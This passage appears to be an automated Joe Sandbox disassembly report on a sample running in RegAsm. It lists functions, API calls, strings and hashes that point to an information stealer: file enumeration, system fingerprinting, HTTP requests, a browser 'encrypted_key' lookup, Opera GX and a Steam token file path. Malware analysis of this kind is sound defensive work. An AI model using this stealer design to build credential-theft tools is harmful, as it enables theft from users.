RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
lstrcatA.KERNEL32(?), ref: 00416396

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Strings

nzA, xrefs: 004164AE

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: nzA
API String ID: 153043497-1761861442
Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55

Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

Strings

ERROR, xrefs: 00416896
ERROR, xrefs: 0041686B

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9

Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98

Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 6C743060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C743095

Part of subcall function 6C7435A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CF688,00001000), ref: 6C7435D5
Part of subcall function 6C7435A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7435E0
Part of subcall function 6C7435A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7435FD
Part of subcall function 6C7435A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C74363F
Part of subcall function 6C7435A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C74369F
Part of subcall function 6C7435A0: __aulldiv.LIBCMT ref: 6C7436E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C74309F

Part of subcall function 6C765B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7656EE,?,00000001), ref: 6C765B85
Part of subcall function 6C765B50: EnterCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765B90
Part of subcall function 6C765B50: LeaveCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765BD8
Part of subcall function 6C765B50: GetTickCount64.KERNEL32 ref: 6C765BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7430BE

Part of subcall function 6C7430F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C743127
Part of subcall function 6C7430F0: __aulldiv.LIBCMT ref: 6C743140

Part of subcall function 6C77AB2A: __onexit.LIBCMT ref: 6C77AB30

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: fcd257f4c3a0a866e72d349b5dd88938ffaa15781323709a9a8798aa81b5fa9c
Instruction ID: 44a6bb592861ee40db77d8e48527d363e971d6850d331fc9380bd4e176600469
Opcode Fuzzy Hash: fcd257f4c3a0a866e72d349b5dd88938ffaa15781323709a9a8798aa81b5fa9c
Instruction Fuzzy Hash: 84F02D12D207499BCB10EF7489851E6B770EF6B214F105339E88877661FB30A3D883D1

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416FFE

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041700E

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5

Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Strings

1iA, xrefs: 00411E47

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1iA
API String ID: 3494564517-1863120733
Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
